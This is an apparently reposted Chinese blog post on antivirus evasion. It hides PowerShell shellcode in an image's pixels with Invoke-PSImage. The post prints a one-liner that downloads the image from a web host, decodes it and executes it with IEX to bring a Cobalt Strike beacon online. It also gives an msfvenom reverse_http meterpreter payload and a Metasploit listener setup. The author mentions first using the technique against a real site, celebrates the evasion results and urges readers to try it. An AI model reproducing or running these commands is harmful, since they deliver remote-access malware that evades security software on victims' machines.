本文共 2024 字,大约阅读时间需要 6 分钟。
——by:chenw
前几天跟一个朋友一起搞一个站的时候,发现那个站点开了很多杀软,使用CS的powershell马无法令其上线。后续在github上找到了一个可以把shellcode隐写到图片的RGB里,然后使其过杀软的检测上线到CS。
今天打算把这个免杀的过程进行一个记录。靶机:win7 IP:192.168.82.136
攻击机:fsec ip:192.168.82.134#1、设置执行策略Set-ExecutionPolicy Unrestricted -Scope CurrentUser#2、导入ps1文件Import-Module .\Invoke-PSimage.ps1#3、生成带有shellcode的图片Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web
之后会得到这么一串代码:
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/shell.png"));$o=a Byte[] 4320;(0..3)|%{foreach($x in(0..1079)){$p=$g.GetPixel($x,$_);$o[$_*1080+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3554])) 并且会得到带有shellcode的图片shell.png:接着将得到的shellcode里的"hell.png"改为我们自己的http服务,这里我使用python3架起一个http服务,命令为: python3 -m http.server 804. 最后来到win7运行该powershell,看CS上是否上线:成功上线。叫上小伙伴来一起快乐的上号😏把其放到virustotal上进行检测,结果如下:免杀效果还是很nice的。
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1后面老规矩,把它丢到与Invoke-PSImage.ps1文件在同一目录,后面操作相同,参考CS平台,生成带有shellcode的图片,然后放入前面架设的http服务内,进行区别,图片叫msf.png:老规矩,将得到的ps代码里的地址改为自己vps的地址。接着在fsec上进行监听:
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_http payload => windows/x64/meterpreter/reverse_httpmsf6 exploit(multi/handler) > set lhost 192.168.82.134lhost => 192.168.82.134msf6 exploit(multi/handler) > set lport 7799lport => 7799msf6 exploit(multi/handler) >然后在靶机上运行该代码使其上线:成功上线。
这么好用的免杀还不赶紧自己动手去试一试
转载地址:http://reakz.baihongyu.com/